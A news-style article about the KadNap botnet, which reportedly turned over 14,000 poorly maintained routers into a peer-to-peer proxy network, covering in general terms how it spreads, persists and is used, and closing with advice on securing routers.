A new malware campaign has infected over 14,000 internet routers around the world, creating a botnet that cybersecurity experts say is very hard to stop. KadNap is the name of the malware that quietly takes over weak networking devices and makes them part of a big proxy network that cybercriminals use. Researchers say that the way this botnet is set up makes it very hard to take down. This shows that poorly maintained internet infrastructure is becoming more and more dangerous.

Finding the KadNap Botnet

Black Lotus Labs, Lumen Technologies' threat intelligence division, found the campaign. Their research showed that KadNap has been spreading since at least August 2025 and has infected thousands of routers and other edge devices that are connected to the internet.

A lot of the affected devices are home or small business routers, especially some Asus models. Researchers think, though, that the campaign might not be limited to just one brand or type of device. Routers are especially appealing targets because they connect local networks to the wider internet, which lets attackers change traffic and stay hidden.

KadNap doesn't steal personal files or damage systems; instead, it turns routers into nodes in a big distributed network. After being infected, these devices act like proxy servers, sending internet traffic to the attackers. This lets hackers hide where they really are and do different things online with the hacked routers.

Researchers think that about 60% of the infected devices are in the US, but infections have also been found in Europe, Asia, and Australia. This malware campaign is likely to be global in scope because it has spread to so many different places. If vulnerable routers aren't patched, it could keep growing.

How the Malware Gets Into Routers

KadNap spreads by taking advantage of security holes in routers that haven't been updated with the latest patches. Many home and small office routers go years without getting firmware updates. This makes them easy targets for attackers who look for old devices on the internet.

Cybercriminals usually use automated scanning tools to find routers that have security holes that are already known. After finding a device that is weak, the attackers run scripts that put the malware on the router.

Most of the time, the infection starts with downloading a malicious script that puts a binary payload on the device. This payload changes the router's system settings and stays on the device for a long time. The attackers set up scheduled tasks that automatically restart the malware processes every time the router reboots to make sure the malware stays active.

Because of this persistence mechanism, restarting the router doesn't get rid of the infection. The malware starts up again every time the device is turned on, so it can stay active for a long time without the user noticing.

After it is installed, the malware collects basic information about the device, such as its external IP address and how long the system has been running. It also links up with other nodes in the botnet to keep operations in sync and keep the network's communication going.

A Botnet That Can Stand Up to Attacks

The decentralized design of KadNap is one of the most worrisome things about it. Centralized command-and-control servers send instructions to infected devices in traditional botnets. The botnet usually falls apart when police find and shut down those servers.

KadNap, on the other hand, uses a peer-to-peer communication system that is based on a changed version of the Kademlia Distributed Hash Table (DHT) protocol. Instead of having to go through a single command server, this technology lets infected routers talk to each other directly.

In a system like this, where there is no central authority, each infected router helps keep the network running by storing and sharing information about other nodes. The rest of the network can keep working and reconnect on its own even if some devices are taken away or disconnected.

This design makes it much harder to break up the botnet. Instead of going after a central control server, investigators would have to find and shut down thousands of infected routers all over the world.

The peer-to-peer system also makes it harder for the attackers to find their way around. Researchers have a much harder time finding the source of malicious activity when commands are spread out over many nodes.

How Hackers Use the Network

The main goal of the KadNap botnet seems to be to build a big proxy network that hackers can use to send their internet traffic.

Attackers can hide their identity by sending traffic through infected routers. This makes it look like bad things are coming from regular home internet connections. This makes it much harder for investigators and cybersecurity systems to find the real criminals.

Proxy networks like this one can help with a lot of different kinds of cybercrime. Attackers might use them to commit online fraud, steal data from websites, start cyberattacks, or get around geographic limits on digital services.

Some people also sell these networks as services on underground cybercrime marketplaces. Criminal groups can rent access to thousands of hacked devices, which lets them do illegal things without having to build their own infrastructure.

Why Routers Are Good Targets

Malware developers are targeting routers and other edge networking devices more and more. Smartphones and personal computers often get automatic updates and security checks, but routers are often left alone after they are set up.

For years, many users don't update their router firmware, leaving known security holes open. Some older routers also stop getting security updates from their makers, which means that any flaws that are found can be used forever.

Attackers also like routers because they are reliable. These gadgets are usually always connected to the internet, which makes them a stable base for long-term operations.

Attackers can create a huge network that stays active for a long time by compromising thousands of routers. Even if some devices are taken off the botnet, many others keep working, which keeps the network up and running.

Risks for People Who Use the Internet

Although infected routers may continue functioning normally, they can pose serious risks. If a router is hacked, it could be used to send bad traffic, which could connect the owner's internet connection to cybercrime.

Distributed denial-of-service (DDoS) attacks can also be done with big botnets. In these attacks, thousands of devices send a lot of traffic to a target website or online service, making it crash or become unavailable.

The rise of router-based botnets shows a bigger problem with internet security than just the immediate threat of cybercrime. As more devices connect to the internet, attackers have more and more vulnerable targets they can use for big operations.

Keeping Malware Away From Routers

Cybersecurity experts say that users can take a number of steps to keep malware from getting into their routers.

First, you should always update your router's firmware to the most recent version that the maker offers. Firmware updates often fix security holes that attackers like to use.

If users don't need them, they should also turn off features like remote management. These features can make routers accessible from the internet, which raises the risk of unauthorized access.

Another important way to protect yourself is to use strong administrative passwords. Many routers get hacked because attackers can easily guess or brute-force weak login information.

Lastly, users should think about getting new routers if their old ones don't get security updates anymore. It's much less likely that modern devices will have unpatched security holes if the manufacturers are still supporting them.

A Growing Worry About Cybersecurity

The KadNap botnet shows how hackers are changing their methods to make bigger and stronger networks of hacked devices. Attackers can build infrastructure that is hard to find and even harder to take down by going after routers that aren't being used and using decentralized communication systems.

Cybersecurity experts say that as more devices connect to the internet, similar campaigns may become more common. Thousands of routers could easily join the next generation of cybercrime botnets if people don't take better care of their devices and use stronger security measures.